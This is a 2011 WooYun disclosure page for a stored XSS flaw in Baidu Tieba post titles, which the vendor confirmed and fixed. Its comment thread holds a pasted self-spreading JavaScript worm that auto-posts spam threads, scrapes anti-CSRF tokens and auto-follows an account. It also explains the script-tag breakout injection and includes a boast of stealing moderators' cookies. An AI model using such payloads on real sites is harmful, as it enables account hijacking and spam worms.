当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02321

漏洞标题:百度贴吧储蓄性xss漏洞。危害极大。

相关厂商:百度

漏洞作者: Clouds

提交时间:2011-06-26 21:21

修复时间:2011-07-27 00:00

公开时间:2011-07-27 00:00

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-06-26: 细节已通知厂商并且等待厂商处理中
2011-06-27: 厂商已经确认,细节仅向厂商公开
2011-07-07: 细节向核心白帽子及相关领域专家公开
2011-07-17: 细节向普通白帽子公开
2011-07-27: 细节向实习白帽子公开
2011-07-27: 细节向公众公开

简要描述:

百度贴吧储蓄性xss漏洞。危害极大。

详细说明:

就是那么出来的,没过滤啊没过滤。

漏洞证明:

http://tieba.baidu.com/f?kz=1121734300

修复方案:

自己看着办

版权声明:转载请注明来源 Clouds@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2011-06-27 11:48

厂商回复:

感谢提交,已修复

最新状态:

暂无

漏洞评价:

评论

  1. 2011-06-26 21:22 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    顶起!

  2. 2011-06-26 21:23 | Clouds ( 实习白帽子 | Rank:55 漏洞数:12 | test)

    已经获取到N个吧主密码。百度这次淡定了。

  3. 2011-06-26 21:30 | anyunix ( 实习白帽子 | Rank:86 漏洞数:8 | 号被盗。)

    大锅,XSS能获取用户密码(非极端条件下)?高级啊牛逼啊。求获取密码的代码啊。

  4. 2011-06-26 21:37 | Clouds ( 实习白帽子 | Rank:55 漏洞数:12 | test)

    cookies.

  5. 2011-06-26 21:42 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    弹登陆框也是不错的选择啊

  6. 2011-06-26 21:44 | Clouds ( 实习白帽子 | Rank:55 漏洞数:12 | test)

    早期的就爆过一次弹登陆框~

  7. 2011-06-27 11:53 | y35u ( 普通白帽子 | Rank:364 漏洞数:38 | yesu)

    原来是谁先在这提交谁得分啊。。。。。

  8. 2012-05-01 12:14 | Say ( 路人 | Rank:17 漏洞数:4 | 谁又会鉴定谁正常?)

    @anyunix 可以取到session,之前标题也可以这么弹function getmyforum(url){xmlHttp = createXHR(); xmlHttp.open("GET",url,false); xmlHttp.send(); result = xmlHttp.responseText;result = result.match(/\/f\?kw=[A-Z0-9\%]*&from=ucenter/g);return result;}function getarg(forumurl){xmlHttp = createXHR(); xmlHttp.open("GET",forumurl,false); xmlHttp.send(); result = xmlHttp.responseText;forumname = result.match("hidden\" name=\"kw\" id=\"kw\" value=\"[^\"]*").toString().split('"')[6];forumname = encodeURIComponent(forumname);fid = result.match("hidden\" name=\"fid\" id=\"fid\" value=\"[^\"]*").toString().split('"')[6];tbs = result.match("PageData.tbs = \"[a-z0-9]+\";").toString().split('"')[1];return [forumname,fid,tbs];}function publish_delay(data,i){var t=setTimeout("publish(data)",1000*i);}function publish(data){ url="http://tieba.baidu.com/f/commit/thread/add";xmlHttp = createXHR(); xmlHttp.open("POST",url,false); xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8"); xmlHttp.send(data);}function followme(){ url = "http://tieba.baidu.com/i/181104344";xmlHttp = createXHR(); xmlHttp.open("GET",url,false); xmlHttp.send();result = xmlHttp.responseText;tbs = result.match("[^_]tbs : \"[0-9a-z]*\"").toString().split('"')[1];portrait = result.match(/UserInfo.request\(\"[0-9a-z]*/).toString().split('"')[1];if(tbs == null || portrait == null){ return;}inf = 'cmd=follow&tbs=' + tbs + '&portrait=' + portrait;url="http://tieba.baidu.com/i/commit?stamp=" + new Date().getTime();;xmlHttp = createXHR(); xmlHttp.open("POST",url); xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8"); xmlHttp.send(inf);}function random_msg(){var tarr = new Array( '说不过就删帖封号,有意思吗?','这个楼我们一定要盖啊啊啊?','绝对震撼人心的语录,2011年','显然,或者,哦,这事做错了?');var carr = new Array(' RT ',' 难道不是吗? ',' 如题','我想说啥来着??','我爱大清国,我怕他完了....');title = tarr[Math.floor(Math.random()*(tarr.length))];content = carr[Math.floor(Math.random()*(carr.length))];return [encodeURIComponent(title),encodeURIComponent(content)];}比如 这个自动发帖的脚本。。

  9. 2012-05-30 17:46 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    这个漏洞的详细说明不详细,我在此补充下此漏洞原理: 帖子里大概有这么一段脚本:<script>var page={ "xx":1, "yy":2, "title":"帖子标题"}</script>其中,【帖子标题】里没有过滤 <,>,/ 等符号,导致<script> 标记可以被提前闭合<script>var page={ "xx":1, "yy":2, "title":"</script><script>自定义脚本内容</script>"}</script>

  10. 2012-06-03 21:37 | Say ( 路人 | Rank:17 漏洞数:4 | 谁又会鉴定谁正常?)

    说起来LZ发的这东西不是我当时发在ID吧的那个吗- -当时玩得不亦乐乎来着 噗